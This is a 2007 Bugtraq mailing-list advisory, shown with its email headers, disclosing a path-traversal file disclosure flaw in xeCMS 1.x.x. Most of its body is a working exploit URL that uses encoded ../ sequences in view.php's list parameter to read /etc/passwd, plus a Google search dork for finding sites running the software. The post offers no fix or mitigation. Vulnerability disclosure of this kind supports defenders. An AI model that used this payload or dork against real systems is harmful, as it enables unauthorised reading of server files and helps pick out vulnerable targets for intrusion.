xeCMS 1.x.x Remote File Disclosure Vulnerability.
- To: bugtraq@xxxxxxxxxxxxxxxxx
- Subject: xeCMS 1.x.x Remote File Disclosure Vulnerability.
- From: p4imi0 <p4imi0@xxxxxxxxx>
- Date: Wed, 19 Dec 2007 22:47:55 +0100
- Dkim-signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:received:received:message-id:date:from:to:subject:mime-version:content-type:content-transfer-encoding:content-disposition; bh=SKDSnZk6UsYretmHCl6833YejZ+aN/Pyt4npMf56wEA=; b=bg2DfKr1kUUoxts2q6psCr6/QIy1DMjDGHmKSkw5AZoSO/jXINGhqsc5La0kL0oLuuCMfYjFZPbZ/yltOelYfujxSsyx1EBBGZKOtDFa56RYLsxRXviHMbfg8ehbXhg/OtCiF1fIUGZ0ERBWKA5XkEKajYVMu+uRVDFyEIb1wBY=
- Domainkey-signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=message-id:date:from:to:subject:mime-version:content-type:content-transfer-encoding:content-disposition; b=LpNcxDCT2vepDCb/NcaVC2jppR0AUQvK4gMWuKaUh8O0rDq785O/9j5it70MEDkIjx5iwVBiG6U/aVbNwN0PTsKy6NtPLFFIrRDvicmMbosSh3XvsjQvvLDWgcIZfybsUO5l1x9Ukeb0kbuluLItg0qGyGxDYZbgwfV434GknsI=
- List-help: <mailto:bugtraq-help@securityfocus.com>
- List-id: <bugtraq.list-id.securityfocus.com>
- List-post: <mailto:bugtraq@securityfocus.com>
- List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
- List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
- Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm
--------------------------------------------------------------
xeCMS 1.x.x Remote File Disclosure Vulnerability.
--------------------------------------------------------------
download : http://xecms.sunsite.dk/
author : p4imi0
contact : p4imi0@xxxxxxxxx
exploit : view.php?list=..%2F..%2F..
%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
google dork : inurl:"view.php?list=" Powered by xeCMS
thanks to : str0ke, Cr[]w.